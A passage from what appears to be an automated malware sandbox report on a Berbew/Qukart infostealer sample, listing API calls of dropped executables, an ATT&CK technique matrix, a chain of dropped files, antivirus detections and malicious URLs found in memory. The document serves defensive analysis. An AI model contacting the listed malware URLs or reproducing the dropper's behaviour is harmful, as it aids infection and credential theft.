                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,19_2_00406753
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,20_2_00403619
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,20_2_00406C29
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_0040129B DsBindWithCredA,CreateFileA,20_2_0040129B
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,20_2_0040129C
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,20_2_00406753
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,21_2_00403619
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,21_2_00406C29
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_0040129B DsBindWithCredA,CreateFileA,21_2_0040129B
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,21_2_0040129C
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,21_2_00406753
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,22_2_00403619
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,22_2_00406C29
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_0040129B DsBindWithCredA,CreateFileA,22_2_0040129B
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,22_2_0040129C
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,22_2_00406753
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,23_2_00403619
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,23_2_00406C29
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_0040129B DsBindWithCredA,CreateFileA,23_2_0040129B
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,23_2_0040129C
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,23_2_00406753
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,24_2_00403619
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,24_2_00406C29
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_0040129B DsBindWithCredA,CreateFileA,24_2_0040129B
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,24_2_0040129C
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,24_2_00406753
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,25_2_00403619
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,25_2_00406C29
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_0040129B DsBindWithCredA,CreateFileA,25_2_0040129B
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,25_2_0040129C
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,25_2_00406753
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,26_2_00403619
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,26_2_00406C29
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_0040129B DsBindWithCredA,CreateFileA,26_2_0040129B
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,26_2_0040129C
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,26_2_00406753
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,27_2_00403619
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,27_2_00406C29
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_0040129B DsBindWithCredA,CreateFileA,27_2_0040129B
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,27_2_0040129C
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,27_2_00406753

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API                      		1
                      Create Account                      		1
                      Process Injection                      		12
                      Masquerading                      		OS Credential Dumping1
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Process Injection                      		LSASS Memory2
                      System Information Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		Junk DataExfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                      Obfuscated Files or Information                      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Software Packing                      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545775 Sample: h879iieoae.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 96 Multi AV Scanner detection for domain / URL 2->96 98 Antivirus detection for dropped file 2->98 100 Antivirus / Scanner detection for submitted sample 2->100 102 7 other signatures 2->102 14 h879iieoae.exe 3 3 2->14         started        process3 file4 82 C:\Windows\SysWOW6482ejhbi32.exe, PE32 14->82 dropped 84 C:\Windows\SysWOW64\Jcofqqkm.dll, PE32 14->84 dropped 86 C:\Windows\...86ejhbi32.exe:Zone.Identifier, ASCII 14->86 dropped 118 Creates an undocumented autostart registry key 14->118 120 Drops executables to the windows directory (C:\Windows) and starts them 14->120 18 Nejhbi32.exe 2 14->18         started        signatures5 process6 file7 54 C:\Windows\SysWOW64\Ogjdllpi.exe, PE32 18->54 dropped 56 C:\Windows\SysWOW64\Bpghkh32.dll, PE32 18->56 dropped 104 Drops executables to the windows directory (C:\Windows) and starts them 18->104 22 Ogjdllpi.exe 2 18->22         started        signatures8 process9 file10 66 C:\Windows\SysWOW64\Opbieagi.exe, PE32 22->66 dropped 68 C:\Windows\SysWOW64\Fkdfmkhi.dll, PE32 22->68 dropped 110 Drops executables to the windows directory (C:\Windows) and starts them 22->110 26 Opbieagi.exe 2 22->26         started        signatures11 process12 file13 74 C:\Windows\SysWOW64\Oglabl32.exe, PE32 26->74 dropped 76 C:\Windows\SysWOW64\Hjanmb32.dll, PE32 26->76 dropped 114 Drops executables to the windows directory (C:\Windows) and starts them 26->114 30 Oglabl32.exe 2 26->30         started        signatures14 process15 file16 88 C:\Windows\SysWOW64\Olijjb32.exe, PE32 30->88 dropped 90 C:\Windows\SysWOW64\Jdackq32.dll, PE32 30->90 dropped 122 Drops executables to the windows directory (C:\Windows) and starts them 30->122 34 Olijjb32.exe 2 30->34         started        signatures17 process18 file19 58 C:\Windows\SysWOW64\Oeanchcn.exe, PE32 34->58 dropped 60 C:\Windows\SysWOW64\Ligdce32.dll, PE32 34->60 dropped 106 Drops executables to the windows directory (C:\Windows) and starts them 34->106 38 Oeanchcn.exe 2 34->38         started        signatures20 process21 file22 70 C:\Windows\SysWOW64\Pdkggn32.dll, PE32 38->70 dropped 72 C:\Windows\SysWOW64\Oceoll32.exe, PE32 38->72 dropped 112 Drops executables to the windows directory (C:\Windows) and starts them 38->112 42 Oceoll32.exe 2 38->42         started        signatures23 process24 file25 78 C:\Windows\SysWOW64\Onkcje32.exe, PE32 42->78 dropped 80 C:\Windows\SysWOW64\Fehgpcld.dll, PE32 42->80 dropped 116 Drops executables to the windows directory (C:\Windows) and starts them 42->116 46 Onkcje32.exe 2 42->46         started        signatures26 process27 file28 92 C:\Windows\SysWOW64\Odekfoij.exe, PE32 46->92 dropped 94 C:\Windows\SysWOW64\Jgemldcp.dll, PE32 46->94 dropped 124 Drops executables to the windows directory (C:\Windows) and starts them 46->124 50 Odekfoij.exe 2 46->50         started        signatures29 process30 file31 62 C:\Windows\SysWOW64\Ojacofgb.exe, PE32 50->62 dropped 64 C:\Windows\SysWOW64\Bdlhdkdf.dll, PE32 50->64 dropped 108 Drops executables to the windows directory (C:\Windows) and starts them 50->108 signatures32

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      h879iieoae.exe82%ReversingLabsWin32.Infostealer.Berbew
                      h879iieoae.exe82%VirustotalBrowse
                      h879iieoae.exe100%AviraTR/Spy.Qukart.NB
                      h879iieoae.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\SysWOW64\Accicdme.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Efgkjnfn.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Bgibkegc.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Bgamkfnl.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Cnjaioih.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Dfcboo32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Ckaenpam.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Baagdk32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Bnnampcf.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Eoappk32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Ajikgq32.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Ajkolbad.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Chfnmf32.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Bdlhdkdf.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Cfnpmb32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Clqdacnn.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Dnhmjm32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Bpghkh32.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Edgbhcim.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Bnpnbp32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Ekpkmk32.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Ccapffke.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Ekpjke32.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Emogai32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Ahhhnd32.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Camgpi32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Dmfdkj32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Ceampi32.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Bqjacldl.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Bmlhnnne.exe100%AviraTR/Spy.Qukart.NB
                      C:\Windows\SysWOW64\Akghbg32.dll100%AviraTR/ATRAPS.Gen
                      C:\Windows\SysWOW64\Accicdme.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Efgkjnfn.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bgibkegc.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bgamkfnl.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Cnjaioih.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Dfcboo32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ckaenpam.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Baagdk32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bnnampcf.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Eoappk32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ajikgq32.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ajkolbad.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Chfnmf32.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bdlhdkdf.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Cfnpmb32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Clqdacnn.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Dnhmjm32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bpghkh32.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Edgbhcim.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bnpnbp32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ekpkmk32.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ccapffke.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ekpjke32.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Emogai32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ahhhnd32.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Camgpi32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Dmfdkj32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Ceampi32.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bqjacldl.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Bmlhnnne.exe100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Akghbg32.dll100%Joe Sandbox ML
                      C:\Windows\SysWOW64\Accicdme.dll90%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Ahhhnd32.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Ajikgq32.dll91%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Akghbg32.dll90%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Bdlhdkdf.dll100%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Bpghkh32.dll96%ReversingLabsWin32.Infostealer.Berbew
                      C:\Windows\SysWOW64\Chfnmf32.dll89%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Ckaenpam.dll91%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Clqdacnn.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Ekpjke32.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Ekpkmk32.dll96%ReversingLabsWin32.Backdoor.Padodor
                      C:\Windows\SysWOW64\Fcjdhk32.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Fehgpcld.dll93%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Fkdfmkhi.dll89%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Flhljo32.dll96%ReversingLabsWin32.Infostealer.Berbew
                      C:\Windows\SysWOW64\Foelkeee.dll91%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Gfdcflnh.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Hdgplo32.dll91%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Hjanmb32.dll92%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Hjdhea32.dll96%ReversingLabsWin32.Infostealer.Berbew
                      C:\Windows\SysWOW64\Hjjfnehb.dll96%ReversingLabsWin32.Backdoor.Padodor
                      C:\Windows\SysWOW64\Ibbpip32.dll96%ReversingLabsWin32.Backdoor.Padodor
                      C:\Windows\SysWOW64\Ibigijoc.dll88%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Iemjhp32.dll96%ReversingLabsWin32.Backdoor.Padodor
                      C:\Windows\SysWOW64\Ipqipqal.dll96%ReversingLabsWin32.Infostealer.Berbew
                      C:\Windows\SysWOW64\Jcofqqkm.dll91%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Jdackq32.dll96%ReversingLabsWin32.Infostealer.Berbew
                      C:\Windows\SysWOW64\Jgemldcp.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Kfnpbj32.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Khlnhl32.dll100%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Lbfpda32.dll96%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Lfcadoap.dll89%ReversingLabsWin32.Backdoor.Berbew
                      C:\Windows\SysWOW64\Lfjejf32.dll96%ReversingLabsWin32.Backdoor.Berbew

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tat-neftbank.ru/kkq.phphttp://tat-neftbank.ru/wcmd.htmSoftware1%VirustotalBrowse
                      http://www.oracle.com/education/oln.0%VirustotalBrowse
                      http://oracle.com/contracts.0%VirustotalBrowse
                      http://tat-neftbank.ru/wcmd.htm10%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://tat-neftbank.ru/kkq.phphttp://tat-neftbank.ru/wcmd.htmSoftwareh879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe, 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, Ppllkpoo.exe, 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, Plbmqa32.exe, 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, Plgflqpn.exe, 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, Pqeoao32.exe, 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, Qgcpihjl.exe, 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, Ajkolbad.exe, 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, Bmlhnnne.exe, 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, Bgamkfnl.exe, 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, Bqjacldl.exe, 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, Bnnampcf.exe, 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmpfalseunknown
                      http://oracle.com/contracts.Fkogfkdj.exe.35.drfalseunknown
                      http://tat-neftbank.ru/wcmd.htmh879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exefalseunknown
